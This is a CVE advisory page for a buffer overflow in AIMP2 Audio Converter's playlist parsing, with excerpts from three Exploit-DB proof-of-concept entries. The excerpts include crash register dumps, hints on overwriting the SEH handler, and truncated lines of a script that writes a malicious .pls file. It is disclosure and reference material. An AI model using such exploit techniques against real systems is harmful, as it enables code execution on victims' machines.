CVE-2009-3170
Published 2009-09-11
Priority P350 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 15.35% (96.4th percentile)
Stack-based buffer overflow in AIMP2 Audio Converter 2.53 (build 330) and earlier allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long File1 argument in a (1) .pls or (2) .m3u playlist file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aimp | aimp2_audio_converter | <= 2.53 | — |
No detection rules found.
Exploit-DB
AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow
exploitdb·2009-11-21
---
#!/usr/bin/python
#
# ######################################################################
# Author contact : seeleymagic[at]hotmail[dot]com
# ######################################################################
#
# *** For educational purposes only ***
# You have been warned
#
# My original crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exemption handler to overwrite EIP...
#
# EIP 00410041
#
# The Info:
#
# I knew this exploit was always possible, but I failed to have the know
Exploit-DB
AIMP2 Audio Converter - Playlist Overflow (SEH)
exploitdb·2009-11-16
---
# Exploit Title : AIMP2 Audio Converter Playlist (pls) BOF
# Discovered by : mr_me (http://milw0rm.com/exploits/9561)
# Author : corelanc0d3r
# Author contact : (corelanc0d3r[at]gmail[dot]com) | http://www.corelan.be:8800
# Date : nov 7th, 2009
# Type : local and remote code execution
# OS : Windows
# Product : AIMP2 Audio Converter (aimp2c.exe)
# Version : aimp2sploit.pls');
print myfile $payload;
print "Wrote " . length($payload)." bytes to aimp2sploit.pls\n";
close(myfile);
Exploit-DB
AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)
exploitdb·2009-09-01
---
#!/usr/bin/python
#
# ######################################################################
#
# AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC
# Found & exploited by: mr_me
# Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip
# Tested on: Wind0ws XP SP3
#
# ######################################################################
#
# Unicode overflow, maybe someone with better skills can exploit this
# you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction.
# Here is the crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000